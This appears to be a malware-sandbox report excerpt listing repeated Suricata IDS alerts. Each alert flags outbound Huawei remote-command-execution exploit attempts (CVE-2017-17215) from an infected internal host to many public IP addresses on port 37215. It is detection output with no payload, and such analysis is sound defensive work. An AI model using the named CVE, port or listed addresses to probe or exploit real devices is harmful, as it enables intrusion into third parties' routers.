                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:39034 -> 41.135.7.8:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42702 -> 157.113.151.184:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43808 -> 137.240.25.6:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43280 -> 48.239.227.107:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51390 -> 138.89.176.45:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55156 -> 65.26.131.20:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51542 -> 116.102.209.86:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33992 -> 83.139.6.78:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33032 -> 107.151.87.122:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:41390 -> 157.90.128.193:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54180 -> 197.84.40.8:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55092 -> 223.31.34.127:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34260 -> 197.129.251.161:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48704 -> 157.227.91.181:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36108 -> 176.145.137.107:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34960 -> 157.207.4.238:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52824 -> 63.169.86.87:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47870 -> 194.21.67.112:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43842 -> 41.7.193.197:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:39174 -> 196.209.10.30:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33262 -> 197.29.91.50:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34426 -> 41.115.189.66:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52876 -> 100.176.184.232:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43406 -> 41.233.30.68:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57574 -> 118.126.42.33:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:37906 -> 44.94.20.220:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60020 -> 41.198.131.57:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42442 -> 197.101.97.189:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54878 -> 197.16.233.142:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51738 -> 41.19.182.60:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47874 -> 157.123.246.221:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33926 -> 72.74.84.41:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57598 -> 41.187.170.98:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53090 -> 157.71.23.105:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:38380 -> 41.75.255.67:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:50782 -> 197.52.77.56:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36424 -> 197.64.151.147:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45944 -> 41.55.183.242:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34582 -> 37.136.57.64:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48088 -> 41.12.240.98:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36772 -> 41.208.218.232:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60316 -> 157.5.195.215:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43198 -> 184.68.240.40:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57416 -> 68.111.3.200:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42116 -> 157.96.37.53:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60306 -> 206.205.145.223:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45428 -> 197.130.209.44:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43802 -> 154.16.84.50:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59456 -> 41.135.159.198:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60920 -> 197.177.192.134:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53648 -> 197.161.82.72:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58744 -> 180.245.93.90:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48426 -> 157.116.190.26:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:56406 -> 41.21.68.251:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51396 -> 142.187.241.12:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48684 -> 130.115.80.30:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54270 -> 41.110.91.100:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:44566 -> 41.213.176.229:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34732 -> 181.98.90.132:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:38252 -> 197.74.237.221:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:46338 -> 31.66.8.34:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:46914 -> 157.134.124.228:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52602 -> 41.236.243.192:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40486 -> 197.186.209.103:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43494 -> 94.9.55.216:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49480 -> 197.40.167.245:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33600 -> 197.5.109.160:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35672 -> 41.180.39.162:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57270 -> 157.162.122.26:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:46976 -> 157.153.140.134:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54192 -> 41.187.6.228:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:37256 -> 41.118.9.133:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54880 -> 157.204.15.178:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59840 -> 41.7.200.113:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42474 -> 61.171.253.143:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:41016 -> 197.162.92.200:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45962 -> 41.199.26.75:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:56414 -> 41.22.62.80:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:46318 -> 103.41.35.97:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59400 -> 41.225.246.218:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43054 -> 41.240.18.60:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45922 -> 197.28.192.177:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40358 -> 41.84.142.27:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36726 -> 41.192.66.211:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:38902 -> 157.27.97.239:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34752 -> 197.144.104.98:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:56098 -> 157.83.245.249:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:39284 -> 157.54.107.228:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36248 -> 197.232.12.159:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:37232 -> 41.79.29.29:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60442 -> 197.132.50.15:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:46382 -> 184.179.98.84:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54866 -> 197.239.104.191:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51104 -> 157.92.99.54:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40478 -> 41.32.104.232:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49062 -> 36.46.72.26:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54892 -> 76.159.253.36:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:41518 -> 41.205.249.120:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33086 -> 41.85.140.44:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57756 -> 157.171.244.79:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57372 -> 197.247.64.127:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45562 -> 157.30.8.212:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55330 -> 23.228.19.180:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45168 -> 92.75.233.252:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35574 -> 197.251.112.251:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49362 -> 197.164.239.33:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:41478 -> 41.156.50.142:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55418 -> 197.76.26.51:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40888 -> 157.118.109.175:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42102 -> 197.249.208.200:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34854 -> 197.225.179.19:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:56914 -> 157.6.172.87:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:41524 -> 157.218.11.179:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49030 -> 41.84.180.43:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51230 -> 157.166.242.4:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54266 -> 151.236.4.26:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58892 -> 197.253.81.140:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:50350 -> 41.197.71.171:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53434 -> 157.202.64.164:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48788 -> 202.167.202.112:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40540 -> 197.139.27.160:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:37906 -> 41.195.228.82:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55832 -> 41.24.137.139:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48262 -> 157.208.141.140:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34600 -> 157.203.25.141:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:41544 -> 197.203.169.128:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43024 -> 84.117.8.76:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53296 -> 41.244.147.226:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:37646 -> 157.218.244.207:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47308 -> 119.14.227.252:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47560 -> 205.76.172.232:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36004 -> 157.148.209.185:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:39580 -> 41.34.225.59:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51924 -> 41.35.100.169:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:50918 -> 173.35.99.179:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35272 -> 197.152.182.89:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42470 -> 157.120.26.114:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:46336 -> 179.12.50.240:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40124 -> 197.227.178.70:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:38514 -> 197.189.246.90:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58354 -> 157.134.48.235:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59214 -> 218.181.184.37:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43000 -> 157.221.242.194:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35738 -> 41.98.119.203:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43850 -> 157.230.129.49:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55422 -> 86.95.195.129:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52558 -> 157.197.238.196:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:37018 -> 41.238.20.133:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35160 -> 197.164.50.207:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45242 -> 41.67.190.198:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58760 -> 197.74.246.253:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:44278 -> 197.227.212.202:37215
                  Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:41136 -> 49.50.30.73:37215
